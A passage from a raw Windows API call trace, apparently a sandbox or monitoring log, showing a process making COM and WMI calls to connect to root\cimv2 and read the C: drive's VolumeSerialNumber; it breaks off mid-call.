mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.379] WbemDefPath:IUnknown:Release (This=0x66ccab8) returned 0x3 [0157.379] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0157.379] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0157.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026020, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0157.379] WbemDefPath:IUnknown:Release (This=0x6026020) returned 0x2 [0157.379] WbemDefPath:IUnknown:Release (This=0x6026020) returned 0x1 [0157.379] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0157.379] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0157.379] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026020, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6026020) returned 0x0 [0157.379] WbemDefPath:IUnknown:AddRef (This=0x6026020) returned 0x3 [0157.379] WbemDefPath:IUnknown:Release (This=0x6026020) returned 0x2 [0157.379] WbemDefPath:IWbemPath:SetText (This=0x6026020, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0157.379] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026020, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0157.379] WbemDefPath:IWbemPath:GetText (in: This=0x6026020, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0157.379] WbemDefPath:IWbemPath:GetText (in: This=0x6026020, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0157.379] WbemDefPath:IWbemPath:GetInfo (in: This=0x6026020, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0157.380] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026020, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0157.380] WbemDefPath:IWbemPath:GetInfo (in: This=0x6026020, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0157.380] WbemDefPath:IWbemPath:GetInfo (in: This=0x6026020, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0157.380] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026020, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0157.380] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0157.380] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0157.380] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.380] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0157.380] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0157.380] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0157.380] IUnknown:Release (This=0xb51e34) returned 0x1 [0157.381] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6024b50) returned 0x0 [0157.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6024b50, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0157.381] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6024b50, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6026090) returned 0x0 [0157.381] WbemDefPath:IUnknown:Release (This=0x6024b50) returned 0x0 [0157.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026090, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6026090) returned 0x0 [0157.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026090, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0157.381] WbemDefPath:IUnknown:AddRef (This=0x6026090) returned 0x3 [0157.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026090, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0157.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026090, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0157.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026090, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66cca78) returned 0x0 [0157.381] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66cca78, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0157.381] WbemDefPath:IUnknown:Release (This=0x66cca78) returned 0x3 [0157.381] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0157.381] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0157.381] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026090, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0157.382] WbemDefPath:IUnknown:Release (This=0x6026090) returned 0x2 [0157.382] WbemDefPath:IUnknown:Release (This=0x6026090) returned 0x1 [0157.382] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0157.382] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0157.382] WbemDefPath:IUnknown:QueryInterface (in: This=0x6026090, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6026090) returned 0x0 [0157.382] WbemDefPath:IUnknown:AddRef (This=0x6026090) returned 0x3 [0157.382] WbemDefPath:IUnknown:Release (This=0x6026090) returned 0x2 [0157.382] WbemDefPath:IWbemPath:SetText (This=0x6026090, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0157.382] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026090, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0157.382] WbemDefPath:IWbemPath:GetText (in: This=0x6026090, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0157.382] WbemDefPath:IWbemPath:GetText (in: This=0x6026090, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.382] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0157.382] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0157.382] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0157.382] IUnknown:Release (This=0xb51e34) returned 0x1 [0157.383] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6024110) returned 0x0 [0157.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6024110, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0157.383] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024110, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6024b60) returned 0x0 [0157.383] WbemLocator:IUnknown:Release (This=0x6024110) returned 0x0 [0157.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6024b60) returned 0x0 [0157.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0157.383] WbemLocator:IUnknown:AddRef (This=0x6024b60) returned 0x3 [0157.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0157.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0157.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0157.383] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0157.383] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0157.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0157.383] WbemLocator:IUnknown:Release (This=0x6024b60) returned 0x2 [0157.383] WbemLocator:IUnknown:Release (This=0x6024b60) returned 0x1 [0157.383] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0157.383] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0157.383] WbemLocator:IUnknown:QueryInterface (in: This=0x6024b60, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6024b60) returned 0x0 [0157.383] WbemLocator:IUnknown:AddRef (This=0x6024b60) returned 0x3 [0157.383] WbemLocator:IUnknown:Release (This=0x6024b60) returned 0x2 [0157.383] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026090, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0157.383] WbemDefPath:IWbemPath:GetText (in: This=0x6026090, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0157.384] WbemDefPath:IWbemPath:GetText (in: This=0x6026090, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0157.384] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6024b00) returned 0x0 [0157.384] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024b00, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x601ef9c) returned 0x0 [0158.221] WbemLocator:IUnknown:QueryInterface (in: This=0x601ef9c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b8b4) returned 0x0 [0158.222] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b8b4, pProxy=0x601ef9c, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0158.222] WbemLocator:IUnknown:Release (This=0xb5b8b4) returned 0x1 [0158.222] WbemLocator:IUnknown:QueryInterface (in: This=0x601ef9c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b8d4) returned 0x0 [0158.222] WbemLocator:IUnknown:QueryInterface (in: This=0x601ef9c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b8b4) returned 0x0 [0158.222] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b8b4, pProxy=0x601ef9c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0158.222] WbemLocator:IUnknown:Release (This=0xb5b8b4) returned 0x2 [0158.222] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x1 [0158.222] CoTaskMemFree (pv=0xbd4a38) [0158.222] WbemLocator:IUnknown:Release (This=0x6024b00) returned 0x0 [0158.222] WbemLocator:IUnknown:QueryInterface (in: This=0x601ef9c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b8d4) returned 0x0 [0158.222] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0158.223] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0158.223] WbemLocator:IUnknown:AddRef (This=0xb5b8d4) returned 0x3 [0158.223] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0158.223] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0158.224] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5b834) returned 0x0 [0158.224] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b834, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0158.224] WbemLocator:IUnknown:Release (This=0xb5b834) returned 0x3 [0158.224] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0158.224] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0158.224] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b8bc) returned 0x0 [0158.224] WbemLocator:IRpcOptions:Query (in: This=0xb5b8bc, pPrx=0xb5b8d4, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0158.224] WbemLocator:IUnknown:Release (This=0xb5b8bc) returned 0x3 [0158.224] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x2 [0158.224] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0158.224] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0158.224] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x601ef9c) returned 0x0 [0158.224] WbemLocator:IUnknown:AddRef (This=0x601ef9c) returned 0x4 [0158.224] WbemLocator:IUnknown:Release (This=0x601ef9c) returned 0x3 [0158.224] WbemLocator:IUnknown:Release (This=0x601ef9c) returned 0x2 [0158.224] SysStringLen (param_1=0x0) returned 0x0 [0158.224] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026020, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0158.224] WbemDefPath:IWbemPath:GetText (in: This=0x6026020, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0158.224] WbemDefPath:IWbemPath:GetText (in: This=0x6026020, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0158.224] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0158.224] WbemLocator:IUnknown:AddRef (This=0xb5b8d4) returned 0x3 [0158.224] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b8d4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b8d4) returned 0x0 [0158.224] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x3 [0158.225] WbemLocator:IUnknown:Release (This=0xb5b8d4) returned 0x2 [0158.225] WbemDefPath:IWbemPath:GetText (in: This=0x6026020, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0158.225] WbemDefPath:IWbemPath:GetText (in: This=0x6026020, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0158.225] IWbemServices:GetObject (in: This=0x601ef9c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6028978, ppCallResult=0x0) returned 0x0 [0158.501] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6026090, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0158.501] WbemDefPath:IWbemPath:GetText (in: This=0x6026090, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0158.501] WbemDefPath:IWbemPath:GetText (in: This=0x6026090, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0158.501] IWbemClassObject:Get (in: This=0x6028978, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), 